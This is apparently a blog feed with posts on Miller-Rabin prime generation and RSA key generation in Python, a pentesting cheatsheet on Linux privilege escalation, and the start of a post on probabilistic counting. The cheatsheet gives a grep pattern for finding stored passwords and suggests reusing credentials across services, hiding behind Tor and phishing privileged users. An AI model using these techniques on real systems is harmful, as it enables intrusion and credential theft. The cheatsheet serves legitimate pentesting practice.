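<p> for all <span class="math">\(k \in \{0,1,...,u-1\}\)</span>, then <span class="math">\(\hat p\)</span> is composite and <span class="math">\(a\)</span> is called a witness for this. If no witness turns up after several random tries, <span class="math">\(\hat p\)</span> is likely a prime number. This is the Miller-Rabin Primality test.</p>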
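<p>As a quick illustration of the two conditions, the sketch below checks a single base against the composite number 561 = 3 · 11 · 17, which fools the Fermat check for base 2. The function name <code>is_witness</code> is an assumption of this example, and the successive powers are obtained by repeated squaring.</p>

```python
def is_witness(a, n):
    """True if base a proves that the odd number n (at least 3) is composite."""
    r, u = n - 1, 0
    while r % 2 == 0:
        r //= 2
        u += 1
    z = pow(a, r, n)            # a**r mod n
    if z == 1 or z == n - 1:
        return False            # both conditions fail already for k = 0
    for _ in range(u - 1):
        z = z * z % n           # next term a**(r * 2**k) mod n
        if z == n - 1:
            return False
    return True

print(pow(2, 560, 561) == 1)    # True: the Fermat check is fooled by base 2
print(is_witness(2, 561))       # True: the Miller-Rabin check is not
```

<p>For 561 the sequence of powers is 263, 166, 67, 1, which never hits 560, so base 2 is a witness.</p>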
<p>The program below implements the Miller-Rabin Primality test. The function runs with acceptable speed and manages to find prime numbers with bit lengths of 2048 and above. I tested the primes on Wolfram Alpha to make sure that the generated numbers are in fact prime numbers. It took me 11 seconds to create a prime number with bit length 2048 on my laptop, which is an acceptable bit length in RSA practice. However, the random number generator is not cryptographically secure, and you probably should not use this prime number generator in your crypto library.</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/env python</span>
<span class="c1"># -*- coding: utf-8 -*-</span>
<span class="kn">import</span> <span class="nn">re</span>
<span class="kn">import</span> <span class="nn">random</span>
<span class="kn">import</span> <span class="nn">math</span>
<span class="sd">"""</span>
<span class="sd">Generate prime numbers with the Miller-Rabin Primality Test.</span>
<span class="sd">For example useful for RSA prime number generation.</span>
<span class="sd">Generating a 2048 Bit Prime takes 11 seconds on my laptop:</span>
<span class="sd"> $ time python generate_primes.py</span>
<span class="sd"> 18687035979164759960466760296206931684048670365627731168581812017856988830965115380270770738787389085718116283127416689537626499398221423941864131345832239438016468120676003896789194409913408615320990238865137075670115908902303929614757662667625835901714318363069492532318855874659498625458479795852690370922508203783115512849318748971370018698508809310655527728638519173556845950918379394995191185954569447143685450657088230510827375976211180471624026433253567874110992844598001397299587423215893037362024063057346321319865682948169846512354337641419160496824946523484362125933347273900485920490790844892064041256141 is prime with bitlength=2048</span>
<span class="sd"> real 0m11.099s</span>
<span class="sd"> user 0m11.068s</span>
<span class="sd"> sys 0m0.020s</span>
<span class="sd">"""</span>
<span class="k">def</span> <span class="nf">fermat_primality_test</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">s</span><span class="o">=</span><span class="mi">5</span><span class="p">):</span>
    <span class="sd">"""</span>
<span class="sd">    a^(p-1) ≡ 1 mod p</span>
<span class="sd">    Input: prime candidate p and security parameter s</span>
<span class="sd">    Output: False if p is composite (always correct), or</span>
<span class="sd">            True if p is prime (only with a certain probability)</span>
<span class="sd">    """</span>
    <span class="k">if</span> <span class="n">p</span> <span class="ow">in</span> <span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">):</span> <span class="c1"># small primes, randrange below needs p of at least 5</span>
        <span class="k">return</span> <span class="kc">True</span>
    <span class="k">if</span> <span class="n">p</span> <span class="o"><</span> <span class="mi">2</span> <span class="ow">or</span> <span class="ow">not</span> <span class="n">p</span> <span class="o">&</span> <span class="mi">1</span><span class="p">:</span> <span class="c1"># 0, 1, negatives and even numbers can't be prime</span>
        <span class="k">return</span> <span class="kc">False</span>

    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">s</span><span class="p">):</span>
        <span class="n">a</span> <span class="o">=</span> <span class="n">random</span><span class="o">.</span><span class="n">randrange</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="n">p</span><span class="o">-</span><span class="mi">2</span><span class="p">)</span>
        <span class="n">x</span> <span class="o">=</span> <span class="nb">pow</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">p</span><span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="n">p</span><span class="p">)</span> <span class="c1"># a**(p-1) % p</span>
        <span class="k">if</span> <span class="n">x</span> <span class="o">!=</span> <span class="mi">1</span><span class="p">:</span>
            <span class="k">return</span> <span class="kc">False</span>
    <span class="k">return</span> <span class="kc">True</span>

<span class="k">def</span> <span class="nf">square_and_multiply</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">k</span><span class="p">,</span> <span class="n">p</span><span class="o">=</span><span class="kc">None</span><span class="p">):</span>
    <span class="sd">"""</span>
<span class="sd">    Square and Multiply Algorithm</span>
<span class="sd">    Parameters: positive integer x and non-negative integer exponent k,</span>
<span class="sd">                optional modulus p</span>
<span class="sd">    Returns: x**k or x**k mod p when p is given</span>
<span class="sd">    """</span>
    <span class="n">b</span> <span class="o">=</span> <span class="nb">bin</span><span class="p">(</span><span class="n">k</span><span class="p">)[</span><span class="mi">2</span><span class="p">:]</span> <span class="c1"># binary digits of k, most significant bit first</span>
    <span class="n">r</span> <span class="o">=</span> <span class="mi">1</span>
    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">b</span><span class="p">:</span>
        <span class="n">r</span> <span class="o">=</span> <span class="n">r</span><span class="o">**</span><span class="mi">2</span>
        <span class="k">if</span> <span class="n">i</span> <span class="o">==</span> <span class="s1">'1'</span><span class="p">:</span>
            <span class="n">r</span> <span class="o">=</span> <span class="n">r</span> <span class="o">*</span> <span class="n">x</span>
        <span class="k">if</span> <span class="n">p</span><span class="p">:</span>
            <span class="n">r</span> <span class="o">%=</span> <span class="n">p</span>
    <span class="k">return</span> <span class="n">r</span>

<span class="k">def</span> <span class="nf">miller_rabin_primality_test</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">s</span><span class="o">=</span><span class="mi">5</span><span class="p">):</span>
    <span class="k">if</span> <span class="n">p</span> <span class="ow">in</span> <span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">):</span> <span class="c1"># small primes, randrange below needs p of at least 5</span>
        <span class="k">return</span> <span class="kc">True</span>
    <span class="k">if</span> <span class="n">p</span> <span class="o"><</span> <span class="mi">2</span> <span class="ow">or</span> <span class="ow">not</span> <span class="p">(</span><span class="n">p</span> <span class="o">&</span> <span class="mi">1</span><span class="p">):</span> <span class="c1"># 0, 1, negatives and even numbers can't be prime</span>
        <span class="k">return</span> <span class="kc">False</span>

    <span class="n">p1</span> <span class="o">=</span> <span class="n">p</span> <span class="o">-</span> <span class="mi">1</span>
    <span class="n">u</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="n">r</span> <span class="o">=</span> <span class="n">p1</span> <span class="c1"># p-1 = 2**u * r</span>

    <span class="k">while</span> <span class="n">r</span> <span class="o">%</span> <span class="mi">2</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
        <span class="n">r</span> <span class="o">>>=</span> <span class="mi">1</span>
        <span class="n">u</span> <span class="o">+=</span> <span class="mi">1</span>

    <span class="c1"># at this stage p-1 = 2**u * r holds</span>
    <span class="k">assert</span> <span class="n">p</span><span class="o">-</span><span class="mi">1</span> <span class="o">==</span> <span class="mi">2</span><span class="o">**</span><span class="n">u</span> <span class="o">*</span> <span class="n">r</span>

    <span class="k">def</span> <span class="nf">witness</span><span class="p">(</span><span class="n">a</span><span class="p">):</span>
        <span class="sd">"""</span>
<span class="sd">        Returns: True, if a is a witness that p is not prime.</span>
<span class="sd">        False, when p might be prime</span>
<span class="sd">        """</span>
        <span class="n">z</span> <span class="o">=</span> <span class="n">square_and_multiply</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">r</span><span class="p">,</span> <span class="n">p</span><span class="p">)</span>
        <span class="k">if</span> <span class="n">z</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
            <span class="k">return</span> <span class="kc">False</span>

        <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">u</span><span class="p">):</span>
            <span class="k">if</span> <span class="n">z</span> <span class="o">==</span> <span class="n">p1</span><span class="p">:</span> <span class="c1"># here z is a**(2**i * r) mod p</span>
                <span class="k">return</span> <span class="kc">False</span>
            <span class="n">z</span> <span class="o">=</span> <span class="n">z</span> <span class="o">*</span> <span class="n">z</span> <span class="o">%</span> <span class="n">p</span> <span class="c1"># square once instead of recomputing the power</span>
        <span class="k">return</span> <span class="kc">True</span>

    <span class="k">for</span> <span class="n">j</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">s</span><span class="p">):</span>
        <span class="n">a</span> <span class="o">=</span> <span class="n">random</span><span class="o">.</span><span class="n">randrange</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="n">p</span><span class="o">-</span><span class="mi">2</span><span class="p">)</span>
        <span class="k">if</span> <span class="n">witness</span><span class="p">(</span><span class="n">a</span><span class="p">):</span>
            <span class="k">return</span> <span class="kc">False</span>

    <span class="k">return</span> <span class="kc">True</span>

<span class="k">def</span> <span class="nf">generate_primes</span><span class="p">(</span><span class="n">n</span><span class="o">=</span><span class="mi">512</span><span class="p">,</span> <span class="n">k</span><span class="o">=</span><span class="mi">1</span><span class="p">):</span>
    <span class="sd">"""</span>
<span class="sd">    Generates prime numbers with bitlength n.</span>
<span class="sd">    Stops after the generation of k prime numbers.</span>
<span class="sd">    Caution: The numbers tested for primality start at</span>
<span class="sd">    a random place, but the tests are drawn with the odd integers</span>
<span class="sd">    following from the random start.</span>
<span class="sd">    """</span>
    <span class="k">assert</span> <span class="n">k</span> <span class="o">></span> <span class="mi">0</span>
    <span class="k">assert</span> <span class="n">n</span> <span class="o">></span> <span class="mi">1</span> <span class="ow">and</span> <span class="n">n</span> <span class="o"><</span> <span class="mi">4096</span>

    <span class="c1"># follows from the prime number theorem: expected number of odd</span>
    <span class="c1"># candidates per prime (informational only, not used below)</span>
    <span class="n">necessary_steps</span> <span class="o">=</span> <span class="n">math</span><span class="o">.</span><span class="n">floor</span><span class="p">(</span> <span class="n">math</span><span class="o">.</span><span class="n">log</span><span class="p">(</span><span class="mi">2</span><span class="o">**</span><span class="n">n</span><span class="p">)</span> <span class="o">/</span> <span class="mi">2</span> <span class="p">)</span>
    <span class="c1"># get n random bits as our first number to test for primality,</span>
    <span class="c1"># with the top bit set (bitlength n) and the low bit set (odd)</span>
    <span class="n">x</span> <span class="o">=</span> <span class="n">random</span><span class="o">.</span><span class="n">getrandbits</span><span class="p">(</span><span class="n">n</span><span class="p">)</span> <span class="o">|</span> <span class="mi">2</span><span class="o">**</span><span class="p">(</span><span class="n">n</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="o">|</span> <span class="mi">1</span>

    <span class="n">primes</span> <span class="o">=</span> <span class="p">[]</span>

    <span class="k">while</span> <span class="n">k</span><span class="o">></span><span class="mi">0</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">miller_rabin_primality_test</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">s</span><span class="o">=</span><span class="mi">7</span><span class="p">):</span>
            <span class="n">primes</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
            <span class="n">k</span> <span class="o">=</span> <span class="n">k</span><span class="o">-</span><span class="mi">1</span>
        <span class="n">x</span> <span class="o">=</span> <span class="n">x</span><span class="o">+</span><span class="mi">2</span> <span class="c1"># skip even numbers</span>

    <span class="k">return</span> <span class="n">primes</span>

<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
    <span class="n">n</span> <span class="o">=</span> <span class="mi">2048</span>
    <span class="n">primes</span> <span class="o">=</span> <span class="n">generate_primes</span><span class="p">(</span><span class="n">n</span><span class="o">=</span><span class="n">n</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">p</span> <span class="ow">in</span> <span class="n">primes</span><span class="p">:</span>
        <span class="nb">print</span><span class="p">(</span><span class="s1">'</span><span class="si">{}</span><span class="s1"> is prime with bitlength=</span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">n</span><span class="p">))</span>

<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
    <span class="n">main</span><span class="p">()</span>
</code></pre></div>
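<p>The security parameter <span class="math">\(s\)</span> controls how likely a composite slips through. For an odd composite number, at most a quarter of all bases fail to be witnesses, so the probability that <span class="math">\(s\)</span> independently chosen random bases all miss is bounded as follows (shown for the value <span class="math">\(s = 7\)</span> used in <code>generate_primes</code>):</p>
<div class="math">$$P(\text{composite } \hat p \text{ passes } s \text{ rounds}) \le 4^{-s}, \qquad 4^{-7} = 2^{-14} \approx 6.1 \cdot 10^{-5}$$</div>
<p>Each additional round therefore lowers the bound by a factor of four.</p>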
<p>Now we are finally able to find large prime numbers efficiently and to complete the RSA Key Generation Algorithm. Below is the updated and fully working RSA Key Generation Algorithm.</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/env python</span>
<span class="c1"># -*- coding: utf-8 -*-</span>
<span class="kn">import</span> <span class="nn">math</span>
<span class="kn">import</span> <span class="nn">eea</span>
<span class="kn">import</span> <span class="nn">random</span>
<span class="k">def</span> <span class="nf">RSA_keygen</span><span class="p">(</span><span class="n">n</span><span class="o">=</span><span class="mi">512</span><span class="p">):</span>
    <span class="sd">"""</span>
<span class="sd">    Perform steps 1. to 5. in the RSA Key Generation process.</span>
<span class="sd">    """</span>
    <span class="c1"># step 1</span>
    <span class="kn">import</span> <span class="nn">generate_primes</span>
    <span class="n">p</span> <span class="o">=</span> <span class="n">generate_primes</span><span class="o">.</span><span class="n">generate_primes</span><span class="p">(</span><span class="n">n</span><span class="o">=</span><span class="n">n</span><span class="p">,</span> <span class="n">k</span><span class="o">=</span><span class="mi">1</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span>
    <span class="n">q</span> <span class="o">=</span> <span class="n">generate_primes</span><span class="o">.</span><span class="n">generate_primes</span><span class="p">(</span><span class="n">n</span><span class="o">=</span><span class="n">n</span><span class="p">,</span> <span class="n">k</span><span class="o">=</span><span class="mi">1</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span>
    <span class="k">while</span> <span class="n">q</span> <span class="o">==</span> <span class="n">p</span><span class="p">:</span> <span class="c1"># p and q must be distinct primes</span>
        <span class="n">q</span> <span class="o">=</span> <span class="n">generate_primes</span><span class="o">.</span><span class="n">generate_primes</span><span class="p">(</span><span class="n">n</span><span class="o">=</span><span class="n">n</span><span class="p">,</span> <span class="n">k</span><span class="o">=</span><span class="mi">1</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span>

    <span class="c1"># step 2 (from here on n is the RSA modulus, not the bit length)</span>
    <span class="n">n</span> <span class="o">=</span> <span class="n">p</span> <span class="o">*</span> <span class="n">q</span>
    <span class="c1"># step 3</span>
    <span class="n">phi_n</span> <span class="o">=</span> <span class="p">(</span><span class="n">p</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span> <span class="o">*</span> <span class="p">(</span><span class="n">q</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span>

    <span class="c1"># step 4 and step 5</span>
    <span class="k">while</span> <span class="kc">True</span><span class="p">:</span>
        <span class="c1"># start at 2, because e = 1 would leave messages unencrypted</span>
        <span class="n">e</span> <span class="o">=</span> <span class="n">random</span><span class="o">.</span><span class="n">randrange</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="n">phi_n</span><span class="p">)</span>
        <span class="k">if</span> <span class="n">math</span><span class="o">.</span><span class="n">gcd</span><span class="p">(</span><span class="n">e</span><span class="p">,</span> <span class="n">phi_n</span><span class="p">)</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
            <span class="c1"># step 5</span>
            <span class="n">gcd</span><span class="p">,</span> <span class="n">s</span><span class="p">,</span> <span class="n">t</span> <span class="o">=</span> <span class="n">eea</span><span class="o">.</span><span class="n">EEA</span><span class="p">(</span><span class="n">phi_n</span><span class="p">,</span> <span class="n">e</span><span class="p">)</span>
            <span class="k">if</span> <span class="n">gcd</span> <span class="o">==</span> <span class="p">(</span><span class="n">s</span><span class="o">*</span><span class="n">phi_n</span> <span class="o">+</span> <span class="n">t</span><span class="o">*</span><span class="n">e</span><span class="p">):</span>
                <span class="n">d</span> <span class="o">=</span> <span class="n">t</span> <span class="o">%</span> <span class="n">phi_n</span>
                <span class="k">break</span>

    <span class="k">return</span> <span class="p">(</span><span class="n">e</span><span class="p">,</span> <span class="n">n</span><span class="p">,</span> <span class="n">d</span><span class="p">)</span>

<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
    <span class="nb">print</span><span class="p">(</span><span class="n">RSA_keygen</span><span class="p">())</span>
</code></pre></div>
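<p>To see that a key triple <span class="math">\((e, n, d)\)</span> of this shape actually works, here is a toy round trip with tiny, insecure primes. It is only a sketch: <code>toy_keygen</code> is a hypothetical helper, the values 61, 53 and 17 are common textbook numbers, and the built-in <code>pow(e, -1, phi_n)</code> (Python 3.8 or newer) stands in for the extended Euclidean algorithm used above.</p>

```python
import math

def toy_keygen(p, q, e):
    """Build an RSA key from given primes p, q and a public exponent e."""
    n = p * q
    phi_n = (p - 1) * (q - 1)
    if math.gcd(e, phi_n) != 1:
        raise ValueError("e must be coprime to phi(n)")
    d = pow(e, -1, phi_n)       # modular inverse of e modulo phi(n)
    return e, n, d

e, n, d = toy_keygen(61, 53, 17)    # tiny textbook primes, insecure by design
message = 65
ciphertext = pow(message, e, n)     # encryption: m**e mod n
recovered = pow(ciphertext, d, n)   # decryption: c**d mod n
print(n, d, ciphertext, recovered)  # 3233 2753 2790 65
```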
<h2>Conclusion</h2>
<p>Creating large primes for the RSA cryptosystem takes little more than a 100-line Python script. The only tools you need are some algorithms from number theory and a textbook on cryptography.</p>
<script type="text/javascript">if (!document.getElementById('mathjaxscript_pelican_#%@#$@#')) {
var align = "left",
indent = "0em",
linebreak = "false";
if (false) {
align = (screen.width < 768) ? "left" : align;
indent = (screen.width < 768) ? "0em" : indent;
linebreak = (screen.width < 768) ? 'true' : linebreak;
}
var mathjaxscript = document.createElement('script');
mathjaxscript.id = 'mathjaxscript_pelican_#%@#$@#';
mathjaxscript.type = 'text/javascript';
mathjaxscript.src = 'https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.3/latest.js?config=TeX-AMS-MML_HTMLorMML';
var configscript = document.createElement('script');
configscript.type = 'text/x-mathjax-config';
configscript[(window.opera ? "innerHTML" : "text")] =
"MathJax.Hub.Config({" +
" config: ['MMLorHTML.js']," +
" TeX: { extensions: ['AMSmath.js','AMSsymbols.js','noErrors.js','noUndefined.js'], equationNumbers: { autoNumber: 'none' } }," +
" jax: ['input/TeX','input/MathML','output/HTML-CSS']," +
" extensions: ['tex2jax.js','mml2jax.js','MathMenu.js','MathZoom.js']," +
" displayAlign: '"+ align +"'," +
" displayIndent: '"+ indent +"'," +
" showMathMenu: true," +
" messageStyle: 'normal'," +
" tex2jax: { " +
" inlineMath: [ ['\\\\(','\\\\)'] ], " +
" displayMath: [ ['$$','$$'] ]," +
" processEscapes: true," +
" preview: 'TeX'," +
" }, " +
" 'HTML-CSS': { " +
" availableFonts: ['STIX', 'TeX']," +
" preferredFont: 'STIX'," +
" styles: { '.MathJax_Display, .MathJax .mo, .MathJax .mi, .MathJax .mn': {color: 'black ! important'} }," +
" linebreaks: { automatic: "+ linebreak +", width: '90% container' }," +
" }, " +
"}); " +
"if ('default' !== 'default') {" +
"MathJax.Hub.Register.StartupHook('HTML-CSS Jax Ready',function () {" +
"var VARIANT = MathJax.OutputJax['HTML-CSS'].FONTDATA.VARIANT;" +
"VARIANT['normal'].fonts.unshift('MathJax_default');" +
"VARIANT['bold'].fonts.unshift('MathJax_default-bold');" +
"VARIANT['italic'].fonts.unshift('MathJax_default-italic');" +
"VARIANT['-tex-mathit'].fonts.unshift('MathJax_default-italic');" +
"});" +
"MathJax.Hub.Register.StartupHook('SVG Jax Ready',function () {" +
"var VARIANT = MathJax.OutputJax.SVG.FONTDATA.VARIANT;" +
"VARIANT['normal'].fonts.unshift('MathJax_default');" +
"VARIANT['bold'].fonts.unshift('MathJax_default-bold');" +
"VARIANT['italic'].fonts.unshift('MathJax_default-italic');" +
"VARIANT['-tex-mathit'].fonts.unshift('MathJax_default-italic');" +
"});" +
"}";
(document.body || document.getElementsByTagName('head')[0]).appendChild(configscript);
(document.body || document.getElementsByTagName('head')[0]).appendChild(mathjaxscript);
}
</script>Privilege Escalation Techniques2016-08-10T12:37:00+02:002016-08-10T12:37:00+02:00Nikolai Tschachertag:incolumitas.com,2016-08-10:/2016/08/10/linux-privilege-escalation/<p>This blog post will serve as a cheatsheet to help in my future pentesting experiments and wargames when I am stuck and don't know how to proceed. I hope it will be of use for some people out there. This document will likely change and evolve in future revisions.</p>
<p>In this blog post I will discuss common privilege escalation techniques. I assume that an attacker has gained a foothold on the server by spawning a webshell via SQL injection or similar web exploitation vectors.</p>
<h3>Helpful resources</h3>
<p>Other people have published great information about the privilege escalation process.</p>
<ul>
<li>https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List#credentials</li>
<li>https://github.com/PenturaLabs/Linux_Exploit_Suggester</li>
<li>http://www.rebootuser.com/?p=1623#.V64XaN_S30p</li>
<li>Script for common checks and detailed security report: <a href="https://github.com/rebootuser/LinEnum">LinEnum</a></li>
</ul>
<h3>Make use of discovered credentials</h3>
<p>Often you can find login credentials to a custom admin web interface in the database. Because humans tend to reuse the same credentials on different services, it's always worth checking whether the discovered login credentials work on other services such as SSH or Telnet. If you can access <code>/etc/passwd</code>, you can try all found credentials on all running services for all user accounts in the passwd file. You may discover the running services with the command <code>netstat -tulpen</code>. If you want to remain anonymous, you should consider tunneling your TCP traffic through Tor with <code>torsocks</code>.</p>
<h3>Search for passwords in the webroot</h3>
<p>If the attacker has spawned a simple shell in the webapp context, it's often only possible to view and modify files in the very same document root. There you can launch a search for common passwords with a command like the following: <code>grep -r -E -l -i -s 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' /etc/</code>. This example searches <code>/etc/</code>; point it at the document root to search the webroot instead. The <code>-s</code> switch suppresses the error messages that grep emits for files it cannot read. The <code>-l</code> flag only prints the names of the files in which the pattern matched, not the matching occurrences. Often people leave all kinds of passwords stored in their webroot. The database credentials for the local webapp might be the same as for the root user of the DBMS.</p>
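<p>If grep is not available but a Python interpreter is, the same kind of search can be sketched as follows. The pattern is a shortened, hypothetical variant of the grep expression above, and <code>files_with_credentials</code> is a name chosen for this example.</p>

```python
import os
import re

# Hypothetical pattern, shortened from the grep expression above.
PATTERN = re.compile(r"(pass(w(or)?d)?|pwd|login|user(name)?)\s*[=:]", re.IGNORECASE)

def files_with_credentials(root):
    """Return paths under root whose content matches PATTERN, like grep -r -l -i -s."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", errors="ignore") as handle:
                    if any(PATTERN.search(line) for line in handle):
                        hits.append(path)
            except OSError:
                continue    # unreadable file: skip silently, like grep -s
    return hits
```

<p>As with <code>grep -l</code>, only the file names are collected, so the hits still have to be inspected by hand.</p>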
<h3>Look up privilege escalation exploits</h3>
<p>After issuing a command like <code>uname -a</code> and obtaining the exact kernel version and Linux distribution, you can try your luck and look for local root exploits. To be honest, I never had much luck going down that route, because in most cases the operating system is up to date. A good starting point is the good old <a href="https://www.exploit-db.com/">exploit database</a>. You might have more luck trying to exploit installed applications. You can list the installed applications with <code>rpm -qa --last | head</code> or with <code>dpkg -l</code>.</p>
<h3>Identify the running services and look for configuration flaws</h3>
<p>This is probably the best way to increase your privileges. How to look up the running services depends on the exact distribution. On CentOS you can look up running services with <code>service --status-all</code>. To see which ports are open, you can always use <code>netstat -tulpen</code> and then look up the services behind the open ports. Then, for each identified service, you need to check the configuration files for mistakes. Often you are able to find passwords in FTP server configurations, or there are <code>.rhosts</code> files that include credentials for remote logins. Sometimes configuration files are also writeable, and you can overwrite existing config files with harmful options.</p>
<h3>Set up some traps for users with higher privileges</h3>
<p>If you can only access a certain part of the system, you might be able to trick users into handing over their passwords themselves. For example, if you control the web mail account of a user with higher privileges (but can only access the web app of this privileged user), you can abuse the reputation of the mail account to write mails to other users of the system and simply social engineer the missing passwords. Good resources for these kinds of exploits can be found <a href="">here</a>. Symlinks are dangerous tools if used correctly.</p>Probabilistic data structures to estimate cardinalities and frequencies of massive streams2016-07-20T22:44:00+02:002016-07-20T22:44:00+02:00Nikolai Tschachertag:incolumitas.com,2016-07-20:/2016/07/20/probabilistic-sketches-big-data/<p>In the following blog post we will introduce three different Big Data algorithms. More specifically, we will
learn about probabilistic data structures that allow us to estimate cardinalities and frequencies of
elements that originate from a massive stream of data. This blog post is heavily inspired by the well-written article on <a href="https://highlyscalable.wordpress.com/2012/05/01/probabilistic-structures-web-analytics-data-mining/">probabilistic data structures for web analytics and data mining</a>. I will not cover the mathematics behind those data structures; the aforementioned article does that much better. If it leaves questions open, you should probably consult the original papers.</p>
<h3>What is Big Data anyways?</h3>
<p>Everybody talks about Big Data nowadays, but what does it mean? For example, if we want to count the number of distinct IP addresses that a very large website encounters each day, we need new approaches. Consider the following straightforward algorithm:</p>
<div class="highlight"><pre><span></span><code><span class="n">unique_ip_addresses</span> <span class="o">=</span> <span class="nb">set</span><span class="p">()</span>
<span class="k">for</span> <span class="n">ip</span> <span class="ow">in</span> <span class="n">stream_of_ip_addresses</span><span class="p">:</span>
    <span class="n">unique_ip_addresses</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">ip</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">end_of_day</span><span class="p">(</span><span class="n">time</span><span class="p">):</span>
        <span class="nb">print</span><span class="p">(</span><span class="s1">'We got </span><span class="si">{}</span><span class="s1"> distinct ip addresses'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">unique_ip_addresses</span><span class="p">)))</span>
        <span class="n">unique_ip_addresses</span> <span class="o">=</span> <span class="nb">set</span><span class="p">()</span>
</code></pre></div>
<p>This way of counting distinct elements works fine for millions of visitors. But what happens if a website is visited 10 billion times a day? At 4 bytes per element, a set holding up to 10^10 entries would need 10^10 * 4 bytes = 40 GB of RAM. Most normal computers simply don't have this much RAM. Additionally, a hash-based set stores more than the raw 4 bytes per element, so the real memory footprint would be even larger. In this blog post we need to simulate such a massive stream of IP addresses. We abstract from real elements and simply use integers. My stream implementation is very simple:</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">random</span>
<span class="k">class</span> <span class="nc">Stream</span><span class="p">:</span>
    <span class="sd">"""</span>
<span class="sd">    Produces random elements and simulates a stream.</span>
<span class="sd">    """</span>
    <span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">n</span><span class="p">,</span> <span class="n">rand_range</span><span class="p">):</span>
        <span class="sd">"""</span>
<span class="sd">        n : Number of elements to produce.</span>
<span class="sd">        rand_range : Produced elements are in this random range.</span>
<span class="sd">        """</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">n</span> <span class="o">=</span> <span class="n">n</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">range</span> <span class="o">=</span> <span class="n">rand_range</span>
    <span class="k">def</span> <span class="nf">produce</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">n</span><span class="p">):</span>
            <span class="k">yield</span> <span class="n">random</span><span class="o">.</span><span class="n">randrange</span><span class="p">(</span><span class="o">*</span><span class="bp">self</span><span class="o">.</span><span class="n">range</span><span class="p">)</span>
    <span class="k">def</span> <span class="fm">__iter__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="k">return</span> <span class="bp">self</span><span class="o">.</span><span class="n">produce</span><span class="p">()</span>
</code></pre></div>
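<p>As a baseline for the estimators that follow, here is a minimal sketch of exact counting on such a simulated stream. The names <code>random_stream</code> and <code>count_distinct_exactly</code> are my own and purely illustrative; the generator stands in for the <code>Stream</code> class so that the snippet runs on its own.</p>

```python
import random
import sys


def random_stream(n, low, high, seed=None):
    """Yield n pseudo-random integers from [low, high). Hypothetical helper."""
    rng = random.Random(seed)
    for _ in range(n):
        yield rng.randrange(low, high)


def count_distinct_exactly(stream):
    """Exact distinct count: remembers every element it has ever seen."""
    seen = set()
    for element in stream:
        seen.add(element)
    # getsizeof reports only the set's own hash table,
    # not the integer objects stored in it.
    return len(seen), sys.getsizeof(seen)


if __name__ == '__main__':
    distinct, set_bytes = count_distinct_exactly(
        random_stream(100000, 1, 1000000, seed=42))
    print('distinct elements:', distinct)
    print('bytes used by the set container:', set_bytes)
```

<p>The memory reported for the set grows with the number of distinct elements, which is exactly the cost the probabilistic counters try to avoid.</p>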
<h3>Counting distinct elements in a stream with much less space</h3>
<p>There are data structures that allow us to determine the cardinality of a set with much less space than O(n). They do so by trading accuracy for space: the cardinality is only estimated, but the estimate stays within an acceptable margin of error.</p>
<h3>Linear Counting</h3>
